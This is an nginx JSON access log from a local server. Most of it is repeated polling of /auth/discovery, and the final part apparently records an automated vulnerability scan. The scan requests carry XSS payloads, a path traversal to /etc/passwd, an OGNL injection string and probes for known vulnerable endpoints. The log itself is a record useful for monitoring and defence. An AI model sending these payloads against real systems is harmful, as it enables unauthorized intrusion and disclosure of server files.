"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:04:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.065","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.065","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.071","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.046","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.066","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.065","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.072","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:05:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"4.305","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:06:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.227","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:06:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.854","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.740","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:06:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.467","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:21:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"502","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:21:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.044","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:22:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.067","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:22:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.070","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:22:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.870","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:22:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.612","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:22:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"3.555","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:23:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.940","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:23:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.472","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:23:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.063","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:23:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.629","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:46:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.739","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:47:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.069","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:47:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.513","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:47:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"3.185","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:47:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"3.612","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:47:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.828","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:14:48:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.898","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:15:18:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.489","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:15:48:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.377","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:18:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.859","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.153","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.275","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.458","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.420","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.721","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.456","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:26:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.630","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:27:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.452","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:27:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.393","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:16:57:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.522","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:17:27:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.295","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:17:57:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.320","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:18:27:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.359","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:18:57:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.365","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:19:27:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.338","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:19:57:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.374","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:20:27:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.302","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:20:57:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.365","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:21:27:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.394","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:21:57:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.300","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:22:27:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.344","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:22:57:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.348","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:23:27:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.375","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:23:57:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.619","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:00:27:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.317","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:00:57:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.393","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:01:27:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.358","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:06:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.111","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:06:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:06:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:06:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:06:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 